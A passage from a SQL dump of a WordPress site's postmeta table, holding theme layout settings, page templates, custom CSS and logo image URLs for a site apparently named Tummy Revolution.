!important;\n max-height: 80px;\n }\n}'),(3147,778,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3148,778,'qodef_top_bar_meta','no'),(3149,850,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3150,850,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3151,850,'_wp_page_template','blog-standard'),(3152,850,'slide_template','default'),(3153,850,'_wpb_vc_js_status','true'),(3154,850,'qodef_page_content_behind_header_meta','no'),(3155,850,'qodef_boxed_background_image_attachment_meta','fixed'),(3156,850,'qodef_disable_vertical_header_background_image_meta','no'),(3157,850,'qodef_disable_header_widget_logo_area_meta','no'),(3158,850,'qodef_disable_header_widget_menu_area_meta','no'),(3159,850,'qodef_title_area_height_meta','140'),(3160,850,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(3161,850,'qodef_title_area_title_tag_meta','h2'),(3162,850,'qodef_title_text_color_meta','#3c3c3c'),(3163,850,'qodef_header_type_meta','header-centered'),(3164,850,'qodef_sidebar_layout_meta','sidebar-33-left'),(3165,850,'qodef_page_content_top_padding','40'),(3166,850,'qodef_page_content_top_padding_mobile','yes'),(3167,850,'_dp_original','664'),(3168,850,'qodef_show_title_area_meta','no'),(3169,853,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3170,853,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3171,853,'_wp_page_template','blog-standard'),(3172,853,'slide_template','default'),(3173,853,'_wpb_vc_js_status','true'),(3174,853,'qodef_page_content_behind_header_meta','no'),(3175,853,'qodef_boxed_background_image_attachment_meta','fixed'),(3176,853,'qodef_disable_vertical_header_background_image_meta','no'),(3177,853,'qodef_disable_header_widget_logo_area_meta','no'),(3178,853,'qodef_disable_header_widget_menu_area_meta','no'),(3179,853,'qodef_title_area_height_meta','140'),(3180,853,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(3181,853,'qodef_title_area_title_tag_meta','h2'),(3182,853,'qodef_title_text_color_meta','#3c3c3c'),(3183,853,'qodef_header_type_meta','header-centered'),(3184,853,'qodef_sidebar_layout_meta','no-sidebar'),(3185,853,'qodef_page_content_top_padding','40'),(3186,853,'qodef_page_content_top_padding_mobile','yes'),(3187,853,'_dp_original','664'),(3188,853,'qodef_show_title_area_meta','no'),(3189,869,'_wpb_shortcodes_custom_css','.vc_custom_1517930803446{padding-bottom: 0px !important;}.vc_custom_1519374171424{padding-bottom: 5px !important;}.vc_custom_1519374212575{padding-top: 55px !important;padding-bottom: 90px !important;}.vc_custom_1519374256472{padding-bottom: 30px !important;}.vc_custom_1517996618111{padding-top: 50px !important;padding-bottom: 70px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h8-img-8.jpg?id=2269) !important;}.vc_custom_1519042182504{padding-left: 0px !important;}'),(3190,869,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3191,869,'_wp_page_template','full-width.php'),(3192,869,'slide_template','default'),(3193,869,'_wpb_vc_js_status','true'),(3194,869,'qodef_page_content_behind_header_meta','no'),(3195,869,'qodef_boxed_background_image_attachment_meta','fixed'),(3196,869,'qodef_disable_vertical_header_background_image_meta','no'),(3197,869,'qodef_disable_header_widget_logo_area_meta','no'),(3198,869,'qodef_disable_header_widget_menu_area_meta','yes'),(3199,869,'qodef_show_title_area_meta','no'),(3200,869,'qodef_header_type_meta','header-standard'),(3201,869,'qodef_set_menu_area_position_meta','right'),(3202,869,'qodef_menu_area_in_grid_meta','yes'),(3203,869,'qodef_page_content_top_padding','0'),(3204,869,'qodef_page_content_top_padding_mobile','yes'),(3205,869,'_wpb_shortcodes_custom_css','.vc_custom_1517930803446{padding-bottom: 0px !important;}.vc_custom_1519374171424{padding-bottom: 5px !important;}.vc_custom_1519374212575{padding-top: 55px !important;padding-bottom: 90px !important;}.vc_custom_1519374256472{padding-bottom: 30px !important;}.vc_custom_1517996618111{padding-top: 50px !important;padding-bottom: 70px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h8-img-8.jpg?id=2269) !important;}.vc_custom_1519042182504{padding-left: 0px !important;}'),(3206,869,'qodef_boxed_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/h8-background-img-11.jpg'),(3207,869,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3208,869,'qodef_logo_image_mobile_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/logo-1.png'),(3209,869,'qodef_header_behaviour_meta','no-behavior'),(3210,869,'qodef_top_bar_meta','no'),(3211,872,'_wpb_shortcodes_custom_css','.vc_custom_1516715206030{margin-top: -7px !important;}.vc_custom_1516715198974{margin-top: -7px !important;}.vc_custom_1516715078902{margin-top: -10px !important;}.vc_custom_1516715086438{margin-top: -10px !important;}'),(3212,872,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3213,872,'_wp_page_template','full-width.php'),(3214,872,'slide_template','default'),(3215,872,'_wpb_vc_js_status','true'),(3216,872,'qodef_page_content_behind_header_meta','no'),(3217,872,'qodef_boxed_background_image_attachment_meta','fixed'),(3218,872,'qodef_disable_vertical_header_background_image_meta','no'),(3219,872,'qodef_disable_header_widget_logo_area_meta','no'),(3220,872,'qodef_disable_header_widget_menu_area_meta','no'),(3221,872,'qodef_header_type_meta','header-minimal'),(3222,872,'qodef_menu_area_background_color_meta','#ffffff'),(3223,872,'qodef_menu_area_background_transparency_meta','0'),(3224,872,'qodef_show_title_area_meta','no'),(3225,872,'qodef_logo_area_background_color_meta','#ffffff'),(3226,872,'qodef_logo_area_background_transparency_meta','0'),(3227,872,'qodef_page_content_top_padding','0'),(3228,872,'qodef_page_content_top_padding_mobile','yes'),(3229,872,'qodef_header_behaviour_meta','no-behavior'),(3230,872,'_wpb_shortcodes_custom_css','.vc_custom_1516715206030{margin-top: -7px !important;}.vc_custom_1516715198974{margin-top: -7px !important;}.vc_custom_1516715078902{margin-top: -10px !important;}.vc_custom_1516715086438{margin-top: -10px !important;}'),(3231,872,'qodef_disable_footer_meta','yes'),(3232,872,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3233,872,'_wpb_post_custom_css','@media only screen and (max-width: 680px) {\n .qodef-iwt.qodef-iwt-icon-right .qodef-iwt-icon img {\n max-width: 95px;\n }\n .qodef-iwt.qodef-iwt-icon-right .qodef-iwt-title {\n font-size: 18px;\n margin-top: 10px !important;\n }\n .qodef-iwt.qodef-iwt-icon-right .qodef-iwt-text {\n font-size: 14px;\n margin-top: 10px !important;\n }\n .qodef-progress-bar .qodef-pb-title-holder {\n margin-top: 15px;\n }\n}\n\n@media only screen and (max-width: 420px) {\n .qodef-iwt.qodef-iwt-icon-right .qodef-iwt-icon img {\n display: none;\n } \n}'),(3234,872,'qodef_top_bar_meta','no'),(3235,872,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3236,872,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3237,1058,'_wpb_shortcodes_custom_css','.vc_custom_1517302383431{padding-top: 130px !important;padding-bottom: 130px !important;}'),(3238,1058,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3239,1058,'_wp_page_template','full-width.php'),(3240,1058,'slide_template','default'),(3241,1058,'_wpb_vc_js_status','true'),(3242,1058,'qodef_page_content_behind_header_meta','no'),(3243,1058,'qodef_boxed_background_image_attachment_meta','fixed'),(3244,1058,'qodef_disable_vertical_header_background_image_meta','no'),(3245,1058,'qodef_disable_header_widget_logo_area_meta','no'),(3246,1058,'qodef_disable_header_widget_menu_area_meta','no'),(3247,1058,'qodef_page_content_top_padding','0'),(3248,1058,'qodef_page_content_top_padding_mobile','yes'),(3249,1058,'qodef_title_area_height_meta','140'),(3250,1058,'qodef_title_area_title_tag_meta','h2'),(3251,1058,'_wpb_shortcodes_custom_css','.vc_custom_1517302383431{padding-top: 130px !important;padding-bottom: 130px !important;}'),(3252,1060,'_wpb_shortcodes_custom_css','.vc_custom_1517302880215{padding-top: 130px !important;padding-bottom: 130px !important;}'),(3253,1060,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3254,1060,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3255,1060,'_wp_page_template','full-width.php'),(3256,1060,'slide_template','default'),(3257,1060,'_wpb_vc_js_status','true'),(3258,1060,'qodef_page_content_behind_header_meta','no'),(3259,1060,'qodef_boxed_background_image_attachment_meta','fixed'),(3260,1060,'qodef_disable_vertical_header_background_image_meta','no'),(3261,1060,'qodef_disable_header_widget_logo_area_meta','no'),(3262,1060,'qodef_disable_header_widget_menu_area_meta','no'),(3263,1060,'_dp_original','1058'),(3264,1060,'qodef_page_content_top_padding','0'),(3265,1060,'qodef_page_content_top_padding_mobile','yes'),(3266,1060,'_wpb_shortcodes_custom_css','.vc_custom_1517302880215{padding-top: 130px !important;padding-bottom: 130px !important;}'),(3267,1060,'qodef_title_area_height_meta','140'),(3268,1060,'qodef_title_area_title_tag_meta','h2'),(3269,1062,'_wpb_shortcodes_custom_css','.vc_custom_1520513396522{padding-top: 50px !important;padding-bottom: 110px !important;}'),(3270,1062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3271,1062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3272,1062,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3273,1062,'_wp_page_template','full-width.php'),(3274,1062,'slide_template','default'),(3275,1062,'_wpb_vc_js_status','true'),(3276,1062,'qodef_page_content_behind_header_meta','no'),(3277,1062,'qodef_boxed_background_image_attachment_meta','fixed'),(3278,1062,'qodef_disable_vertical_header_background_image_meta','no'),(3279,1062,'qodef_disable_header_widget_logo_area_meta','no'),(3280,1062,'qodef_disable_header_widget_menu_area_meta','no'),(3281,1062,'qodef_page_content_top_padding','0'),(3282,1062,'qodef_page_content_top_padding_mobile','yes'),(3283,1062,'_dp_original','1060'),(3284,1062,'_wpb_shortcodes_custom_css','.vc_custom_1520513396522{padding-top: 50px !important;padding-bottom: 110px !important;}'),(3285,1062,'qodef_title_area_height_meta','140'),(3286,1062,'qodef_title_area_title_tag_meta','h2'),(3287,1062,'qodef_title_area_in_grid_meta','no'),(3288,1064,'_wpb_shortcodes_custom_css','.vc_custom_1520513632415{padding-top: 50px !important;padding-bottom: 83px !important;}'),(3289,1064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3290,1064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3291,1064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3292,1064,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3293,1064,'_wp_page_template','full-width.php'),(3294,1064,'slide_template','default'),(3295,1064,'_wpb_vc_js_status','true'),(3296,1064,'qodef_page_content_behind_header_meta','no'),(3297,1064,'qodef_boxed_background_image_attachment_meta','fixed'),(3298,1064,'qodef_disable_vertical_header_background_image_meta','no'),(3299,1064,'qodef_disable_header_widget_logo_area_meta','no'),(3300,1064,'qodef_disable_header_widget_menu_area_meta','no'),(3301,1064,'qodef_page_content_top_padding','0'),(3302,1064,'qodef_page_content_top_padding_mobile','yes'),(3303,1064,'_dp_original','1062'),(3304,1064,'_wpb_shortcodes_custom_css','.vc_custom_1520513632415{padding-top: 50px !important;padding-bottom: 83px !important;}'),(3305,1064,'qodef_title_area_height_meta','140'),(3306,1064,'qodef_title_area_title_tag_meta','h2'),(3307,1064,'qodef_menu_area_in_grid_meta','no'),(3308,1064,'qodef_title_area_in_grid_meta','no'),(3309,1067,'_wpb_shortcodes_custom_css','.vc_custom_1519137505805{padding-top: 114px !important;padding-bottom: 130px !important;}'),(3310,1067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3311,1067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3312,1067,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3313,1067,'_wp_page_template','full-width.php'),(3314,1067,'slide_template','default'),(3315,1067,'_wpb_vc_js_status','true'),(3316,1067,'qodef_page_content_behind_header_meta','no'),(3317,1067,'qodef_boxed_background_image_attachment_meta','fixed'),(3318,1067,'qodef_disable_vertical_header_background_image_meta','no'),(3319,1067,'qodef_disable_header_widget_logo_area_meta','no'),(3320,1067,'qodef_disable_header_widget_menu_area_meta','no'),(3321,1067,'qodef_page_content_top_padding','0'),(3322,1067,'qodef_page_content_top_padding_mobile','yes'),(3323,1067,'_dp_original','1060'),(3324,1067,'qodef_title_area_height_meta','140'),(3325,1067,'qodef_title_area_title_tag_meta','h2'),(3326,1067,'_wpb_shortcodes_custom_css','.vc_custom_1519137505805{padding-top: 114px !important;padding-bottom: 130px !important;}'),(3328,1117,'_wp_page_template','default'),(3329,1117,'slide_template','default'),(3330,1117,'_wpb_vc_js_status','true'),(3331,1117,'qodef_page_content_behind_header_meta','no'),(3332,1117,'qodef_boxed_background_image_attachment_meta','fixed'),(3333,1117,'qodef_disable_vertical_header_background_image_meta','no'),(3334,1117,'qodef_disable_header_widget_logo_area_meta','no'),(3335,1117,'qodef_disable_header_widget_menu_area_meta','no'),(3336,1117,'qodef_show_title_area_meta','no'),(3337,1117,'qodef_header_type_meta','header-divided'),(3338,1117,'qodef_sidebar_layout_meta','sidebar-33-right'),(3339,1117,'qodef_custom_sidebar_area_meta','home-6'),(3342,1117,'qodef_show_posts_per_page_meta','5'),(3343,1117,'qodef_page_content_top_padding','76'),(3344,1117,'qodef_top_bar_meta','no'),(3345,1117,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/Logo-1000-x-.png'),(3346,1117,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/Logo-1000-x-.png'),(3347,1117,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/Logo-1000-x-.png'),(3348,1117,'qodef_logo_image_sticky_meta','http://tummyrevolution.com/wp-content/uploads/2020/04/Logo-New-TR-web.jpg'),(3349,1336,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3350,1336,'_wp_page_template','default'),(3351,1336,'slide_template','default'),(3352,1336,'_wpb_vc_js_status','false'),(3353,1336,'qodef_page_content_behind_header_meta','no'),(3354,1336,'qodef_boxed_background_image_attachment_meta','fixed'),(3355,1336,'qodef_disable_vertical_header_background_image_meta','no'),(3356,1336,'qodef_disable_header_widget_logo_area_meta','no'),(3357,1336,'qodef_disable_header_widget_menu_area_meta','no'),(3358,1338,'_wpb_shortcodes_custom_css','.vc_custom_1521026420279{padding-top: 100px !important;}.vc_custom_1521026432731{padding-top: 100px !important;padding-bottom: 100px !important;}'),(3359,1338,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3360,1338,'_wp_page_template','full-width.php'),(3361,1338,'slide_template','default'),(3362,1338,'_wpb_vc_js_status','true'),(3363,1338,'_wpb_shortcodes_custom_css','.vc_custom_1521026420279{padding-top: 100px !important;}.vc_custom_1521026432731{padding-top: 100px !important;padding-bottom: 100px !important;}'),(3364,1338,'qodef_page_content_behind_header_meta','no'),(3365,1338,'qodef_boxed_background_image_attachment_meta','fixed'),(3366,1338,'qodef_disable_vertical_header_background_image_meta','no'),(3367,1338,'qodef_disable_header_widget_logo_area_meta','no'),(3368,1338,'qodef_disable_header_widget_menu_area_meta','no'),(3369,1338,'qodef_page_content_top_padding','0'),(3370,1338,'qodef_page_content_top_padding_mobile','yes'),(3371,1338,'qodef_header_type_meta','header-standard'),(3372,1338,'qodef_title_area_type_meta','breadcrumbs'),(3373,1338,'qodef_title_area_height_meta','140'),(3374,1338,'qodef_title_area_title_tag_meta','h2'),(3375,1338,'qodef_set_menu_area_position_meta','center'),(3376,1338,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3377,1338,'qodef_top_bar_meta','no'),(3378,1504,'_wpb_shortcodes_custom_css','.vc_custom_1520584797330{padding-bottom: 65px !important;}.vc_custom_1518171466628{padding-top: 36px !important;padding-bottom: 100px !important;}.vc_custom_1517402697931{background-color: #fcfcfc !important;}'),(3379,1504,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3380,1504,'_wp_page_template','full-width.php'),(3381,1504,'slide_template','default'),(3382,1504,'_wpb_vc_js_status','true'),(3383,1504,'qodef_page_content_behind_header_meta','no'),(3384,1504,'qodef_boxed_background_image_attachment_meta','fixed'),(3385,1504,'qodef_paspartu_color_meta','#ffbea5'),(3386,1504,'qodef_paspartu_width_meta','32px'),(3387,1504,'qodef_disable_vertical_header_background_image_meta','no'),(3388,1504,'qodef_disable_header_widget_logo_area_meta','no'),(3389,1504,'qodef_disable_header_widget_menu_area_meta','no'),(3390,1504,'qodef_paspartu_meta','yes'),(3391,1504,'qodef_show_title_area_meta','no'),(3392,1504,'_wpb_shortcodes_custom_css','.vc_custom_1520584797330{padding-bottom: 65px !important;}.vc_custom_1518171466628{padding-top: 36px !important;padding-bottom: 100px !important;}.vc_custom_1517402697931{background-color: #fcfcfc !important;}'),(3393,1504,'qodef_paspartu_responsive_width_meta','25px'),(3394,1504,'qodef_header_type_meta','header-minimal'),(3395,1504,'qodef_menu_area_side_padding_meta','24px'),(3396,1504,'qodef_page_content_top_padding','0'),(3397,1504,'qodef_page_content_top_padding_mobile','yes'),(3398,1504,'qodef_header_behaviour_meta','no-behavior'),(3399,1504,'qodef_uncovering_footer_meta','no'),(3400,1504,'_wpb_post_custom_css','#qodef-back-to-top.on {\n display:none;\n}'),(3401,1504,'qodef_top_bar_meta','no'),(3402,1504,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3403,1504,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3404,1504,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3405,1682,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3406,1682,'_wp_page_template','default'),(3407,1682,'slide_template','default'),(3408,1682,'_wpb_vc_js_status','false'),(3409,1682,'qodef_page_content_behind_header_meta','no'),(3410,1682,'qodef_boxed_background_image_attachment_meta','fixed'),(3411,1682,'qodef_disable_vertical_header_background_image_meta','no'),(3412,1682,'qodef_disable_header_widget_logo_area_meta','no'),(3413,1682,'qodef_disable_header_widget_menu_area_meta','no'),(3414,1684,'_wpb_shortcodes_custom_css','.vc_custom_1520326536245{padding-top: 82px !important;padding-bottom: 99px !important;}'),(3415,1684,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3416,1684,'_wp_page_template','full-width.php'),(3417,1684,'slide_template','default'),(3418,1684,'_wpb_vc_js_status','true'),(3419,1684,'qodef_page_content_behind_header_meta','no'),(3420,1684,'qodef_boxed_background_image_attachment_meta','fixed'),(3421,1684,'qodef_disable_vertical_header_background_image_meta','no'),(3422,1684,'qodef_disable_header_widget_logo_area_meta','no'),(3423,1684,'qodef_disable_header_widget_menu_area_meta','no'),(3424,1684,'qodef_page_content_top_padding','0'),(3425,1684,'qodef_page_content_top_padding_mobile','yes'),(3426,1684,'qodef_header_type_meta','header-centered'),(3427,1684,'qodef_header_behaviour_meta','no-behavior'),(3428,1684,'qodef_title_area_type_meta','breadcrumbs'),(3429,1684,'qodef_title_area_height_meta','140'),(3430,1684,'qodef_title_area_title_tag_meta','h2'),(3431,1684,'_wpb_shortcodes_custom_css','.vc_custom_1520326536245{padding-top: 82px !important;padding-bottom: 99px !important;}'),(3432,1693,'_wpb_shortcodes_custom_css','.vc_custom_1520326882193{padding-top: 82px !important;padding-bottom: 130px !important;}'),(3433,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3434,1693,'_wpb_shortcodes_custom_css','.vc_custom_1520326882193{padding-top: 82px !important;padding-bottom: 130px !important;}'),(3435,1693,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3436,1693,'_wp_page_template','full-width.php'),(3437,1693,'slide_template','default'),(3438,1693,'_wpb_vc_js_status','true'),(3439,1693,'qodef_page_content_behind_header_meta','no'),(3440,1693,'qodef_boxed_background_image_attachment_meta','fixed'),(3441,1693,'qodef_disable_vertical_header_background_image_meta','no'),(3442,1693,'qodef_disable_header_widget_logo_area_meta','no'),(3443,1693,'qodef_disable_header_widget_menu_area_meta','no'),(3444,1693,'qodef_page_content_top_padding','0'),(3445,1693,'qodef_page_content_top_padding_mobile','yes'),(3446,1693,'qodef_header_type_meta','header-centered'),(3447,1693,'qodef_header_behaviour_meta','no-behavior'),(3448,1693,'qodef_title_area_type_meta','breadcrumbs'),(3449,1693,'qodef_title_area_height_meta','140'),(3450,1693,'qodef_title_area_title_tag_meta','h2'),(3451,1693,'_wpb_shortcodes_custom_css','.vc_custom_1520326882193{padding-top: 82px !important;padding-bottom: 130px !important;}'),(3452,1693,'_dp_original','1684'),(3453,1698,'_wpb_shortcodes_custom_css','.vc_custom_1520326926011{padding-top: 82px !important;padding-bottom: 100px !important;}'),(3454,1698,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3455,1698,'_wpb_shortcodes_custom_css','.vc_custom_1520326926011{padding-top: 82px !important;padding-bottom: 100px !important;}'),(3456,1698,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3457,1698,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3458,1698,'_wpb_shortcodes_custom_css','.vc_custom_1520326926011{padding-top: 82px !important;padding-bottom: 100px !important;}'),(3459,1698,'_wpb_shortcodes_custom_css','.vc_custom_1520326926011{padding-top: 82px !important;padding-bottom: 100px !important;}'),(3460,1698,'_wp_page_template','full-width.php'),(3461,1698,'slide_template','default'),(3462,1698,'_wpb_vc_js_status','true'),(3463,1698,'qodef_page_content_behind_header_meta','no'),(3464,1698,'qodef_boxed_background_image_attachment_meta','fixed'),(3465,1698,'qodef_disable_vertical_header_background_image_meta','no'),(3466,1698,'qodef_disable_header_widget_logo_area_meta','no'),(3467,1698,'qodef_disable_header_widget_menu_area_meta','no'),(3468,1698,'qodef_page_content_top_padding','0'),(3469,1698,'qodef_page_content_top_padding_mobile','yes'),(3470,1698,'qodef_header_type_meta','header-centered'),(3471,1698,'qodef_header_behaviour_meta','no-behavior'),(3472,1698,'qodef_title_area_type_meta','breadcrumbs'),(3473,1698,'qodef_title_area_height_meta','140'),(3474,1698,'qodef_title_area_title_tag_meta','h2'),(3475,1698,'_dp_original','1693'),(3476,1700,'_wpb_shortcodes_custom_css','.vc_custom_1520326654834{padding-top: 82px !important;padding-bottom: 130px !important;}'),(3477,1700,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3478,1700,'_wpb_shortcodes_custom_css','.vc_custom_1520326654834{padding-top: 82px !important;padding-bottom: 130px !important;}'),(3479,1700,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3480,1700,'_wp_page_template','full-width.php'),(3481,1700,'slide_template','default'),(3482,1700,'_wpb_vc_js_status','true'),(3483,1700,'qodef_page_content_behind_header_meta','no'),(3484,1700,'qodef_boxed_background_image_attachment_meta','fixed'),(3485,1700,'qodef_disable_vertical_header_background_image_meta','no'),(3486,1700,'qodef_disable_header_widget_logo_area_meta','no'),(3487,1700,'qodef_disable_header_widget_menu_area_meta','no'),(3488,1700,'qodef_page_content_top_padding','0'),(3489,1700,'qodef_page_content_top_padding_mobile','yes'),(3490,1700,'qodef_header_type_meta','header-centered'),(3491,1700,'qodef_header_behaviour_meta','no-behavior'),(3492,1700,'qodef_title_area_type_meta','breadcrumbs'),(3493,1700,'qodef_title_area_height_meta','140'),(3494,1700,'qodef_title_area_title_tag_meta','h2'),(3495,1700,'_wpb_shortcodes_custom_css','.vc_custom_1520326654834{padding-top: 82px !important;padding-bottom: 130px !important;}'),(3496,1700,'_dp_original','1684'),(3497,1702,'_wpb_shortcodes_custom_css','.vc_custom_1520326722470{padding-top: 82px !important;padding-bottom: 99px !important;}'),(3498,1702,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3499,1702,'_wpb_shortcodes_custom_css','.vc_custom_1520326722470{padding-top: 82px !important;padding-bottom: 99px !important;}'),(3500,1702,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3501,1702,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3502,1702,'_wpb_shortcodes_custom_css','.vc_custom_1520326722470{padding-top: 82px !important;padding-bottom: 99px !important;}'),(3503,1702,'_wpb_shortcodes_custom_css','.vc_custom_1520326722470{padding-top: 82px !important;padding-bottom: 99px !important;}'),(3504,1702,'_wp_page_template','full-width.php'),(3505,1702,'slide_template','default'),(3506,1702,'_wpb_vc_js_status','true'),(3507,1702,'qodef_page_content_behind_header_meta','no'),(3508,1702,'qodef_boxed_background_image_attachment_meta','fixed'),(3509,1702,'qodef_disable_vertical_header_background_image_meta','no'),(3510,1702,'qodef_disable_header_widget_logo_area_meta','no'),(3511,1702,'qodef_disable_header_widget_menu_area_meta','no'),(3512,1702,'qodef_page_content_top_padding','0'),(3513,1702,'qodef_page_content_top_padding_mobile','yes'),(3514,1702,'qodef_header_type_meta','header-centered'),(3515,1702,'qodef_header_behaviour_meta','no-behavior'),(3516,1702,'qodef_title_area_type_meta','breadcrumbs'),(3517,1702,'qodef_title_area_height_meta','140'),(3518,1702,'qodef_title_area_title_tag_meta','h2'),(3519,1702,'_dp_original','1700'),(3520,1724,'_wpb_shortcodes_custom_css','.vc_custom_1520329974958{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3521,1724,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3522,1724,'_wpb_shortcodes_custom_css','.vc_custom_1520329974958{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3523,1724,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3524,1724,'_wp_page_template','full-width.php'),(3525,1724,'slide_template','default'),(3526,1724,'_wpb_vc_js_status','true'),(3527,1724,'qodef_page_content_behind_header_meta','no'),(3528,1724,'qodef_boxed_background_image_attachment_meta','fixed'),(3529,1724,'qodef_disable_vertical_header_background_image_meta','no'),(3530,1724,'qodef_disable_header_widget_logo_area_meta','no'),(3531,1724,'qodef_disable_header_widget_menu_area_meta','no'),(3532,1724,'qodef_page_content_top_padding','0'),(3533,1724,'qodef_page_content_top_padding_mobile','yes'),(3534,1724,'qodef_header_type_meta','header-centered'),(3535,1724,'qodef_header_behaviour_meta','no-behavior'),(3536,1724,'qodef_title_area_type_meta','breadcrumbs'),(3537,1724,'qodef_title_area_height_meta','140'),(3538,1724,'qodef_title_area_title_tag_meta','h3'),(3539,1724,'_wpb_shortcodes_custom_css','.vc_custom_1520329974958{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3540,1724,'_dp_original','1684'),(3541,1728,'_wpb_shortcodes_custom_css','.vc_custom_1520330242268{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3542,1728,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3543,1728,'_wpb_shortcodes_custom_css','.vc_custom_1520330242268{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3544,1728,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3545,1728,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3546,1728,'_wpb_shortcodes_custom_css','.vc_custom_1520330242268{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3547,1728,'_wpb_shortcodes_custom_css','.vc_custom_1520330242268{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3548,1728,'_wp_page_template','full-width.php'),(3549,1728,'slide_template','default'),(3550,1728,'_wpb_vc_js_status','true'),(3551,1728,'qodef_page_content_behind_header_meta','no'),(3552,1728,'qodef_boxed_background_image_attachment_meta','fixed'),(3553,1728,'qodef_disable_vertical_header_background_image_meta','no'),(3554,1728,'qodef_disable_header_widget_logo_area_meta','no'),(3555,1728,'qodef_disable_header_widget_menu_area_meta','no'),(3556,1728,'qodef_page_content_top_padding','0'),(3557,1728,'qodef_page_content_top_padding_mobile','yes'),(3558,1728,'qodef_header_type_meta','header-centered'),(3559,1728,'qodef_header_behaviour_meta','no-behavior'),(3560,1728,'qodef_title_area_type_meta','breadcrumbs'),(3561,1728,'qodef_title_area_height_meta','140'),(3562,1728,'qodef_title_area_title_tag_meta','h3'),(3563,1728,'_dp_original','1724'),(3564,1730,'_wpb_shortcodes_custom_css','.vc_custom_1520330349854{padding-top: 70px !important;padding-bottom: 130px !important;}'),(3565,1730,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3566,1730,'_wpb_shortcodes_custom_css','.vc_custom_1520330349854{padding-top: 70px !important;padding-bottom: 130px 